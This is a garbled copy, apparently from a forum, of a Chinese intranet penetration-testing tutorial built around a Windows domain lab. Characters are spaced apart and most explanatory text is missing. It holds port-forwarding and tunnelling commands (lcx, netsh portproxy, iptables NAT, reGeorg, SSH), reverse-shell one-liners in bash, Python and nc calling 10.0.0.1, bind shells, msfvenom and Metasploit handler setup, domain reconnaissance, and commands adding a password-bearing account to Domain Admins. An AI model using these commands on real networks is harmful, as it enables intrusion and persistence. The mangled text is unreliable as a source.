[21370] 2020-11-02_内网渗透学习(搭建实验环境到利用)

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-11-02_内网渗透学习(搭建实验环境到利用)   L e m o n S e c   2 0 2 0 - 1 1 - 0 2 D C :   w i n 2 0 0 8   D M :   w i n 2 0 0 3   D M :   w i n x p w i n 2 0 0 8 ( )   1 2 i p :   1 9 2 . 1 6 8 . 2 0 6 . 2 3 - - - 4 :   d o s d c p r o m o
P s a d m i n i s t r a t o r 5 , ,   h t t p : / / a n g e r f i r e . b l o g . 5 1 c t o . c o m / 1 9 8 4 5 5 / 1 4 4 1 2 3 / 6 w i n 2 0 0 3 w i n x p 0 8 1   d n s   s e r v e r i p
2
  W i n d o w s 使 /   & &   1 w i n d o w s   l c x n e t s h   t c p k r b t g t A D   S e r v e r   2 0 0 8   R 2 h t t p : / / w w w . i t 1 6 5 . n e t / o s / h t m l / 2 0 1 3 0 6 / 5 4 9 3 . h t m l A c i t v e   D i r e c t o r y   h t t p : / / b l o g . s i n a . c o m . c n / s / b l o g _ 6 c e 0 f 2 c 9 0 1 0 1 4 o k t . h t m l 1 2 3 4 , 2 3 3 3 : l c x . e x e   - l i s t e n   1 2 3 4   2 3 3 3 3 3 8 9 1 2 3 4 : l c x . e x e   - s l a v e   i p   1 2 3 4   1 2 7 . 0 . 0 . 1   3 3 8 9 n e t s h   i n t e r f a c e   p o r t p r o x y   s e t   v 4 t o v 4   l i s t e n a d d r e s s = 1 9 2 . 1 6 8 . 2 0 6 . 1 0 1   l i s t e n p o r t = 3 3 3 3   c o n n e c t a d d r e s s = 1 9 2 . 1 6 8 . 2 0 6 . 1 0 0   c o n n e c t p o r t = 3 3 8 9 1 9 2 . 1 6 8 . 2 0 6 . 1 0 1 : 3 3 8 8 1 0 0 3 3 8 9 n e t s h   i n t e r f a c e   p o r t p r o x y   d e l e t e   v 4 t o v 4   l i s t e n p o r t = 9 0 9 0 n e t s h   i n t e r f a c e   p o r t p r o x y   s h o w   a l l x p i p v 6 n e t s h   i n t e r f a c e   i p v 6   i n s t a l l
2 l i n u x   p o r t m a p i p t a b l e s s o c k e t   x s o c k s   1 w i n d o w s w i n d o w s 使 P r o x i f i e r s o c k e t h t t p : / / a o f e n g b l o g . b l o g . 1 6 3 . c o m / b l o g / s t a t i c / 6 3 1 7 0 2 1 2 0 1 4 8 5 7 3 8 5 1 7 4 0 / 1 2 3 4 , 2 3 3 3 : . / p o r t m a p   - m   2   - p 1   1 2 3 4   - p 2   2 3 3 3 3 3 8 9 1 2 3 4 . / p o r t m a p   - m   1   - p 1   3 3 8 9   - h 2   i p   - p 2   1 2 3 4 1 / e t c / s y s c t l . c o n f n e t . i p v 4 . i p _ f o r w a r d   =   1 2 s e r v i c e   i p t a b l e s   s t o p 3 访 1 9 2 . 1 6 8 . 2 0 6 . 1 0 1 w e b 1 9 2 . 1 6 8 . 2 0 6 . 1 2 9 i p t a b l e s   - t   n a t   - A   P R E R O U T I N G   - - d s t   1 9 2 . 1 6 8 . 2 0 6 . 1 2 9   - p   t c p   - - d p o r t   3 3 8 9   - j   D N A T   - - t o - d e s t i n a t i o n   1 9 2 . 1 6 8 . 2 0 6 . 1 0 1 : 3 3 8 9 i p t a b l e s   - t   n a t   - A   P O S T R O U T I N G   - - d s t   1 9 2 . 1 6 8 . 2 0 6 . 1 0 1   - p   t c p   - - d p o r t   3 3 8 9   - j   S N A T   - - t o - s o u r c e   1 9 2 . 1 6 8 . 2 0 6 . 1 2 9 4 & & s e r v i c e   i p t a b l e s   s a v e   & &   s e r v i c e   i p t a b l e s   s t a r t
2 l i n u x   使 p r o x y c h a i n s s o c k e t   k a l i / e t c / p r o x y c h a i n s . c o n f   s o c k s 5   1 2 7 . 0 . 0 . 1   8 8 8 8 p r o x y c h a i n s h t t p : / / r o o t k i t e r . c o m / E a r t h W o r m / + + s o c k e t h t t p s o c k e t ( )   d m z w e b 便 便 h t t p   1   t u n n a 2 s o c k s   r e G e o r g s s h h t t p : / / s t a f f . w a s h i n g t o n . e d u / c o r e y / f w / s s h - p o r t - f o r w a r d i n g . h t m l 1 2 s o c k s > ( 3 3 8 9 1 2 3 4 ) > p y t h o n   p r o x y . p y   - u   h t t p : / / l e m o n . c o m / c o n n . j s p   - l   1 2 3 4   - r   3 3 8 9   - v > > ( s s h ) > p y t h o n   p r o x y . p y   - u   h t t p : / / l e m o n . c o m / c o n n . j s p   - l   1 2 3 4   - r   2 2   - v   - s > > 1 9 2 . 1 6 8 . 0 . 2 3 3 8 9 > p y t h o n   p r o x y . p y   - u   h t t p : / / l e m o n . c o m / c o n n . j s p   - l   1 2 3 4   - a   1 9 2 . 1 6 8 . 0 . 2   - r   3 3 8 9 p y t h o n   r e G e o r g S o c k s P r o x y . p y   - u   h t t p : / / 1 9 2 . 1 6 8 . 2 0 6 . 1 0 1 / t u n n e l . p h p   - p   8 0 8 1 访 1 2 7 . 0 . 0 . 1 : p o r t 1 h o s t : p o r t 2 ( ) s s h   - C f N g   - L   p o r t 1 : 1 2 7 . 0 . 0 . 1 : p o r t 2   u s e r @ h o s t         # 访 h o s t : p o r t 2 访 1 2 7 . 0 . 0 . 1 : p o r t 1 s s h   - C f N g   - R   p o r t 2 : 1 2 7 . 0 . 0 . 1 : p o r t 1   u s e r @ h o s t         # d m z _ h o s t h o s t p o r t r e m o t e _ i p p o r t s s h   - q T f n N   - L   p o r t : d m z _ h o s t : h o s t p o r t   - l   u s e r   r e m o t e _ i p       # p o r t d m z _ h o s t h o s t p o r t r e m o t e _ i p p o r t s s h   - q T f n N   - R   p o r t : d m z _ h o s t : h o s t p o r t   - l   u s e r   r e m o t e _ i p       # 穿 s o c k e t : s s h   - q T f n N   - D   p o r t   r e m o t e h o s t
s h e l l   s h e l l   s h e l l i m c p _ s h e l l t c p i m c p ~ k a l i ( i p w i n 0 3 ) w i n 0 3 i c m p S h e l l   k a l i d m z s h e l l s h e l l h t t p m e t a s p l o i t 1 b a s h   - i   > &   / d e v / t c p / 1 0 . 0 . 0 . 1 / 8 0 8 0   0 > & 1 2 p y t h o n   - c   ' i m p o r t   s o c k e t , s u b p r o c e s s , o s ; s = s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T , s o c k e t . S O C K _ S T R E A M ) ; s . c o n n e c t ( ( " 1 0 . 0 . 0 . 1 " , 1 2 3 4 ) ) ; o s . d u p 2 ( s . f i l e n o ( ) , 0 ) ;   o s . d u p 2 ( s . f i l e n o ( ) , 1 ) ;   o s . d u p 2 ( s . f i l e n o ( ) , 2 ) ; p = s u b p r o c e s s . c a l l ( [ " / b i n / s h " , " - i " ] ) ; ' 3 r m   / t m p / f ; m k f i f o   / t m p / f ; c a t   / t m p / f | / b i n / s h   - i   2 > & 1 | n c   1 0 . 0 . 0 . 1   1 2 3 4   > / t m p / f h t t p : / / w i k i . w o o y u n . o r g / p e n t e s t : % E 5 % 9 0 % 8 4 % E 7 % A 7 % 8 D % E 8 % A F % A D % E 8 % A 8 % 8 0 % E 4 % B 8 % 8 0 % E 5 % 8 F % A 5 % E 8 % A F % 9 D % E 5 % 8 F % 8 D % E 5 % B C % B 9 s h e l l i c m p s h . e x e   - t   k a l i _ i p   - d   5 0 0   - b   3 0   - s   1 2 8 1 m s f v e n o m   - p   w i n d o w s / x 6 4 / s h e l l / b i n d _ t c p   L P O R T = 1 2 3 4 5   - f   e x e   - o   . / s h e l l . e x e b i n d _ s h e l l 2 t u n n a p y t h o n   p r o x y . p y   - u   h t t p : / / l e m o n . c o m / c o n n . j s p     - l   1 1 1 1   - r   1 2 3 4 5   v 3 u s e   e x p l o i t / m u l t i / h a n d l e r s e t   p a y l o a d   w i n d o w s / x 6 4 / s h e l l / b i n d _ t c p s e t   L P O R T   1 1 1 1 s e t   R H O S T   1 2 7 . 0 . 0 . 1
h t t p s : / / w w w . 9 1 r i . o r g / 1 1 7 2 2 . h t m l s h e l l ( )   1 ( r e m a r k D c ) 2 3 i p v 4 , , 1 n c   - e   / b i n / s h   - l p   1 2 3 4 2 n c . e x e   - e   c m d . e x e   - l p   1 2 3 4 C : D o c u m e n t s   a n d   S e t t i n g s A d m i n i s t r a t o r D e s k t o p > n e t   v i e w S e r v e r   N a m e                         R e m a r k - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - D C 1 D M - W I N X P D M _ W I N 0 3 T h e   c o m m a n d   c o m p l e t e d   s u c c e s s f u l l y . C : D o c u m e n t s   a n d   S e t t i n g s A d m i n i s t r a t o r D e s k t o p > n e t   v i e w   / d o m a i n D o m a i n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - C E N T O S O T h e   c o m m a n d   c o m p l e t e d   s u c c e s s f u l l y . C : D o c u m e n t s   a n d   S e t t i n g s A d m i n i s t r a t o r D e s k t o p > p i n g   - n   1   D C 1   - 4 P i n g i n g   D C 1 . c e n t o s o . c o m   [ 1 9 2 . 1 6 8 . 2 0 6 . 1 0 0 ]   w i t h   3 2   b y t e s   o f   d a t a : R e p l y   f r o m   1 9 2 . 1 6 8 . 2 0 6 . 1 0 0 :   b y t e s = 3 2   t i m e < 1 m s   T T L = 1 2 8 P i n g   s t a t i s t i c s   f o r   1 9 2 . 1 6 8 . 2 0 6 . 1 0 0 :         P a c k e t s :   S e n t   =   1 ,   R e c e i v e d   =   1 ,   L o s t   =   0   ( 0 %   l o s s ) , A p p r o x i m a t e   r o u n d   t r i p   t i m e s   i n   m i l l i - s e c o n d s :         M i n i m u m   =   0 m s ,   M a x i m u m   =   0 m s ,   A v e r a g e   =   0 m s P s : b a t p i n g i p @ e c h o   o f f s e t l o c a l   E N A B L E D E L A Y E D E X P A N S I O N @ F O R   / F   " u s e b a c k q   e o l = -   s k i p = 1   d e l i m s = "   % % j   I N   ( ` n e t   v i e w   ^ |   f i n d   " "   / v   ^ | f i n d   " T h e   c o m m a n d   c o m p l e t e d   s u c c e s s f u l l y . "   / v ` )   D O   ( @ F O R   / F   " u s e b a c k q   d e l i m s = "   % % i   I N   ( ` @ p i n g   - n   1   - 4   % % j   ^ |   f i n d s t r   " P i n g i n g " ` )   D O   ( @ F O R   / F   " u s e b a c k q   t o k e n s = 2   d e l i m s = [ ] "   % % k   I N   ( ` e c h o   % % i ` )   D O   ( e c h o   % % k     % % j ) ) ) T h e   r e q u e s t   w i l l   b e   p r o c e s s e d   a t   a   d o m a i n   c o n t r o l l e r   f o r   d o m a i n S y s t e m   e r r o r   1 3 2 6   h a s   o c c u r r e d . L o g o n   f a i l u r e :   u n k n o w n   u s e r   n a m e   o r   b a d   p a s s w o r d .
4 5 6 7 8 9 ( , ) 1 0 L o g o n   f a i l u r e :   u n k n o w n   u s e r   n a m e   o r   b a d   p a s s w o r d . d s q u e r y   u s e r C : U s e r s l e m o n D e s k t o p > n e t   u s e r   / d o m a i n U s e r   a c c o u n t s   f o r   D C 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - A d m i n i s t r a t o r                         G u e s t                                         k r b t g t l e m o n                                         p e n t e s t T h e   c o m m a n d   c o m p l e t e d   s u c c e s s f u l l y . C : U s e r s l e m o n D e s k t o p > n e t   g r o u p   / d o m a i n G r o u p   A c c o u n t s   f o r   D C 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - * D n s U p d a t e P r o x y * D o m a i n   A d m i n s * D o m a i n   C o m p u t e r s * D o m a i n   C o n t r o l l e r s * D o m a i n   G u e s t s * D o m a i n   U s e r s * E n t e r p r i s e   A d m i n s * E n t e r p r i s e   R e a d - o n l y   D o m a i n   C o n t r o l l e r s * G r o u p   P o l i c y   C r e a t o r   O w n e r s * R e a d - o n l y   D o m a i n   C o n t r o l l e r s * S c h e m a   A d m i n s T h e   c o m m a n d   c o m p l e t e d   s u c c e s s f u l l y . C : U s e r s l e m o n D e s k t o p > n e t   g r o u p   " D o m a i n   A d m i n s "   / d o m a i n G r o u p   n a m e           D o m a i n   A d m i n s C o m m e n t                 D e s i g n a t e d   a d m i n i s t r a t o r s   o f   t h e   d o m a i n M e m b e r s - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - A d m i n i s t r a t o r n e t   u s e r   l e m o n   i a m @ L 3 m 0 n   / a d d   / d o m a i n n e t   g r o u p   " D o m a i n   A d m i n s "   l e m o n   / a d d   / d o m a i n C : D o c u m e n t s   a n d   S e t t i n g s A d m i n i s t r a t o r D e s k t o p > n e t   c o n f i g   W o r k s t a t i o n C o m p u t e r   n a m e                                                 D M _ W I N 0 3 F u l l   C o m p u t e r   n a m e                                       D M _ w i n 0 3 . c e n t o s o . c o m U s e r   n a m e                                                         A d m i n i s t r a t o r W o r k s t a t i o n   a c t i v e   o n                 N e t b i o s S m b   ( 0 0 0 0 0 0 0 0 0 0 0 0 )                 N e t B T _ T c p i p _ { 6 B 2 5 5 3 C 1 - C 7 4 1 - 4 E E 3 - A F B F - C E 3 B A 1 C 9 D D F 7 }   ( 0 0 0 C 2 9 8 5 F 6 E 4 ) S o f t w a r e   v e r s i o n                                           M i c r o s o f t   W i n d o w s   S e r v e r   2 0 0 3 W o r k s t a t i o n   d o m a i n                                       C E N T O S O W o r k s t a t i o n   D o m a i n   D N S   N a m e                     c e n t o s o . c o m L o g o n   d o m a i n                                                   D M _ W I N 0 3 C O M   O p e n   T i m e o u t   ( s e c )                               0 C O M   S e n d   C o u n t   ( b y t e )                                 1 6 C O M   S e n d   T i m e o u t   ( m s e c )                             2 5 0 n e t   g r o u p   " D o m a i n   c o n t r o l l e r s " d s q u e r y   c o m p u t e r
1 1 n e t 1 2   1 2 3 i p c o n f i g d n s 4 2 1 / 2 2 / 6 9 f t p / t f t p 2 2 s s h O p e n S S H 2 8 退 2 3 t e l n e t 2 5 s m t p 5 3 D N S D N S D N S D N S D N S D N S 6 7 / 6 8 d h c p 1 1 0 p o p 3 1 3 9 s a m b a 访 1 4 3 i m a p 1 6 1 s n m p 3 8 9 l d a p 访 5 1 2 / 5 1 3 / 5 1 4 l i n u x   r 使 r l o g i n 8 7 3 r s y n c 访 1 0 8 0 s o c k e t 1 3 5 2 l o t u s 1 4 3 3 m s s q l 使 , n e t   g r o u p   " D o m a i n   C o m p u t e r s "   / d o m a i n > 1 n e t   u s e   z :   d c 0 1 s y s v o l > 2 n e t   v i e w   1 9 2 . 1 6 8 . 0 . 1 > 3 a p p $ d : c o n f i g > n e t   s h a r e   a p p $ = d : c o n f i g t r a c e r t   8 . 8 . 8 . 8 C : U s e r s l e m o n D e s k t o p > n e t   t i m e   / d o m a i n C u r r e n t   t i m e   a t   D C 1 . c e n t o s o . c o m   i s   3 / 2 1 / 2 0 1 6   1 2 : 3 7 : 1 5   A M C : D o c u m e n t s   a n d   S e t t i n g s A d m i n i s t r a t o r D e s k t o p > N s l o o k u p   - t y p e = S R V   _ l d a p . _ t c p . * * *   C a n ' t   f i n d   s e r v e r   a d d r e s s   f o r   ' _ l d a p . _ t c p . ' : D N S   r e q u e s t   t i m e d   o u t .         t i m e o u t   w a s   2   s e c o n d s . * * *   C a n ' t   f i n d   s e r v e r   n a m e   f o r   a d d r e s s   1 9 2 . 1 6 8 . 2 0 6 . 1 0 0 :   T i m e d   o u t S e r v e r :     U n K n o w n A d d r e s s :     1 9 2 . 1 6 8 . 2 0 6 . 1 0 0 * * *   U n K n o w n   c a n ' t   f i n d   - t y p e = S R V :   N o n - e x i s t e n t   d o m a i n i p c o n f i g / a l l n e t   g r o u p   " D o m a i n   C o n t r o l l e r s "   / d o m a i n
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则